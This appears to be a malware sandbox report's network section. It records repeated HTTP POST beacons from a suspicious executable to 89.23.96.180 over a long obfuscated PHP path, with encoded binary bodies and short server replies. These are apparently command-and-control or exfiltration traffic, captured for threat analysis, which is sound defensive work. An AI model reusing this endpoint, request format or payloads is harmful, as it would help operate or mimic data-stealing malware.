                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  52192.168.2.54995289.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:43.367108107 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:03:43.718601942 CET2536OUTData Raw: 5d 51 43 5e 5d 58 57 56 55 5e 55 5a 54 5f 50 5c 57 5f 5c 5c 52 55 51 56 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: ]QC^]XWVU^UZT_P\W_\\RUQVZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#.U2>=U)*,/?'/;:8"7>12!(4?=$X)%!_.#Q,6
                                                                                  Dec 21, 2024 10:03:44.746711969 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:03:44.980382919 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:03:44 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  53192.168.2.54995889.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:45.229773998 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:03:45.578068972 CET2536OUTData Raw: 58 53 43 54 5d 5d 57 50 55 5e 55 5a 54 5a 50 56 57 53 5c 5c 52 50 51 59 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: XSCT]]WPU^UZTZPVWS\\RPQYZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#:1T%*!..0%/.8-P#)1T5< <,[*%!_.#Q,"


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  54192.168.2.54995989.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:46.293195009 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2112
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:03:46.640572071 CET2112OUTData Raw: 58 50 43 52 5d 57 52 50 55 5e 55 5a 54 53 50 5d 57 5a 5c 59 52 56 51 5b 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: XPCR]WRPU^UZTSP]WZ\YRVQ[ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ C.(T&)T*&9?Y3< S:^&49Y'!6P<$#?> Y)!_.#Q,
                                                                                  Dec 21, 2024 10:03:47.672502995 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:03:47.908140898 CET349INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:03:47 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 39 38 0d 0a 0e 1e 39 1e 21 38 35 52 3f 5c 3c 07 2a 06 29 0d 3e 2e 3e 59 2f 31 2f 5f 23 2c 03 00 3d 04 23 1d 24 3e 33 11 35 03 3a 00 20 2f 2f 13 3d 0b 2e 58 01 1e 22 1b 23 33 21 53 27 3c 33 1e 3e 51 25 06 2b 2e 2a 1e 27 2c 27 53 25 04 38 16 3c 3a 33 08 25 13 26 59 2f 11 01 59 28 10 37 0d 27 36 2b 51 03 1e 26 1f 24 3f 3f 52 31 0d 31 5b 26 07 21 14 37 2e 3b 11 3e 28 37 53 23 3b 2e 5d 38 2a 38 58 28 03 2d 04 3d 01 3a 58 24 12 0d 18 26 14 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 989!85R?\<*)>.>Y/1/_#,=#$>35: //=.X"#3!S'<3>Q%+.*','S%8<:3%&Y/Y(7'6+Q&$??R11[&!7.;>(7S#;.]8*8X(-=:X$&#T-,H1]V0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  55192.168.2.54996089.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:46.428020954 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:03:46.781085968 CET2536OUTData Raw: 58 5e 46 57 5d 5c 52 57 55 5e 55 5a 54 5f 50 51 57 58 5c 5c 52 52 51 5c 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: X^FW]\RWU^UZT_PQWX\\RRQ\ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#," &&=_:Y8%?<U.;>7?%X215+^(>8Z)5!_.#Q,6
                                                                                  Dec 21, 2024 10:03:47.806485891 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:03:48.044274092 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:03:47 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  56192.168.2.54996689.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:48.294677019 CET380OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Dec 21, 2024 10:03:48.640434980 CET2536OUTData Raw: 58 56 43 53 5d 5b 52 55 55 5e 55 5a 54 5d 50 53 57 53 5c 5b 52 56 51 5b 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: XVCS][RUU^UZT]PSWS\[RVQ[ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ D:<T%.>>%-_'/0.4?\%=(7'_([;>%!_.#Q,>
                                                                                  Dec 21, 2024 10:03:49.673124075 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:03:49.908051968 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:03:49 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  57192.168.2.54997289.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:50.147106886 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:03:50.499782085 CET2536OUTData Raw: 58 51 43 50 58 59 57 55 55 5e 55 5a 54 5f 50 50 57 58 5c 5a 52 5e 51 5c 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: XQCPXYWUU^UZT_PPWX\ZR^Q\ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ C:?%)V="![9?,'/:=S#5Y2%*$^?.<_>5!_.#Q,6
                                                                                  Dec 21, 2024 10:03:51.523997068 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:03:51.756331921 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:03:51 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  58192.168.2.54997889.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:51.994601011 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:03:52.343694925 CET2536OUTData Raw: 58 5f 43 51 58 5a 52 55 55 5e 55 5a 54 53 50 53 57 59 5c 5f 52 53 51 59 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: X_CQXZRUU^UZTSPSWY\_RSQYZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ .W#%U>W6,<0'?(W987,9\&"P*'#_?- [=!_.#Q,


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  59192.168.2.54997989.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:53.106097937 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2112
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:03:53.453059912 CET2112OUTData Raw: 58 5f 43 52 58 5c 57 5f 55 5e 55 5a 54 58 50 53 57 5a 5c 5b 52 52 51 5b 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: X_CRX\W_U^UZTXPSWZ\[RRQ[ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ -2>)P)1..,8%<<U98%#?[26V+4>-,X)5!_.#Q,*
                                                                                  Dec 21, 2024 10:03:54.486151934 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:03:54.720328093 CET349INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:03:54 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 39 38 0d 0a 0e 1e 39 11 21 2b 2e 0d 28 5c 37 1d 2a 3c 25 09 2b 3e 3e 58 2f 22 06 05 22 2f 3a 13 3d 04 3b 1d 27 10 20 02 23 3a 25 58 21 2f 0e 06 29 21 2e 58 01 1e 22 19 20 23 29 1c 27 2f 3f 55 29 27 32 17 2b 3d 26 5d 27 2f 09 19 25 39 23 05 3d 2a 23 08 32 3d 29 02 2c 11 01 59 28 3d 2f 0e 24 36 2b 51 03 1e 26 5d 31 3c 3b 57 25 33 1c 00 32 3d 26 06 22 3e 23 53 29 16 33 50 37 15 2d 05 3b 39 0a 5c 3f 03 39 01 2a 06 26 1d 24 3c 3b 51 26 2e 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 989!+.(\7*<%+>>X/""/:=;' #:%X!/)!.X" #)'/?U)'2+=&]'/%9#=*#2=),Y(=/$6+Q&]1<;W%32=&">#S)3P7-;9\?9*&$<;Q&.#T-,H1]V0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  60192.168.2.54998589.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:53.280339956 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:03:53.624950886 CET2536OUTData Raw: 58 52 43 55 5d 5d 57 52 55 5e 55 5a 54 53 50 5c 57 5f 5c 54 52 53 51 5c 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: XRCU]]WRU^UZTSP\W_\TRSQ\ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#-?1-?15\,< ^',R:*#<*1=(B+[([#+%!_.#Q,
                                                                                  Dec 21, 2024 10:03:54.656378031 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:03:54.892455101 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:03:54 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  61192.168.2.54998689.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:55.137728930 CET380OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Dec 21, 2024 10:03:55.513958931 CET2536OUTData Raw: 58 5f 43 56 58 5a 57 53 55 5e 55 5a 54 53 50 5d 57 58 5c 5e 52 52 51 57 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: X_CVXZWSU^UZTSP]WX\^RRQWZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#9'$=)V=&.Y$Y$Y,98)R#<"12V(7?[+-<[*!_.#Q,
                                                                                  Dec 21, 2024 10:03:56.514733076 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:03:56.748373985 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:03:56 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  62192.168.2.54999289.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:56.993843079 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:03:57.343554020 CET2536OUTData Raw: 58 53 46 57 5d 59 57 56 55 5e 55 5a 54 52 50 57 57 58 5c 5c 52 53 51 59 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: XSFW]YWVU^UZTRPWWX\\RSQYZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ :,W%=V):9/$(W.(& :'2.(\+ _*!_.#Q,
                                                                                  Dec 21, 2024 10:03:58.380250931 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:03:58.614343882 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:03:58 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  63192.168.2.54999889.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:58.896707058 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:03:59.249995947 CET2536OUTData Raw: 58 5f 43 51 5d 5c 57 51 55 5e 55 5a 54 5d 50 53 57 59 5c 5c 52 5f 51 5a 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: X_CQ]\WQU^UZT]PSWY\\R_QZZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ 9$=V=2![9?0':57)]%!-?7#>.?>!_.#Q,>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  64192.168.2.55000489.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:59.855909109 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2112
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:04:00.202969074 CET2112OUTData Raw: 58 5e 43 56 58 5a 57 56 55 5e 55 5a 54 5c 50 5d 57 5a 5c 55 52 57 51 5d 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
